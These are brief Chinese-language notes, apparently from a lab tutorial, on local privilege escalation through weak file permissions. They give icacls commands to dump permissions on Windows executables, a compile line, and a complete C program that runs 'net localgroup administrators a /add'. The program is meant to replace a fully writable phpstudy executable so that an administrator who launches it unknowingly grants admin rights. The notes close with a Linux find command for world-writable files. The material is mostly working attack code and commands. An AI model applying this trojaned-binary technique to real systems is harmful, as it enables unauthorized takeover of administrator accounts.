利用管理员对服务器的权限分配不当完成的权限提升(开发者的意识不够强)
一般情况下面 普通用户对程序是没有控制权的
• icacls • icacls c:windows*.exe /save perm /T • i586-mingw32msvc-gcc -o admin.exe admin.c (因为exe要给windows用所以这里使用i586-mingw32msvc-gcc这个编译) • Find
然后在c盘更目录下面生成了 asd文件 我们用记事本查看 就可以知道每一个exe的权限
但是很遗憾这种情况没有找到
我们看一下我们需要的脚本
#include<stdlib.h> int main() { int i; i=system("net localgroup administrators a /add"); return 0; }
这里为了满足实验要求 我们这里加一个普通用户
这里我们以phpstudy为例子 user配置不当 对他的操作是 完全控制
把我们刚才上传的exe改名为这个
然后当管理点击这个的时候 就是默认吧a加入管理员组
那么在liunx如何提权呐???
• find / -perm 777 -exec ls -l {}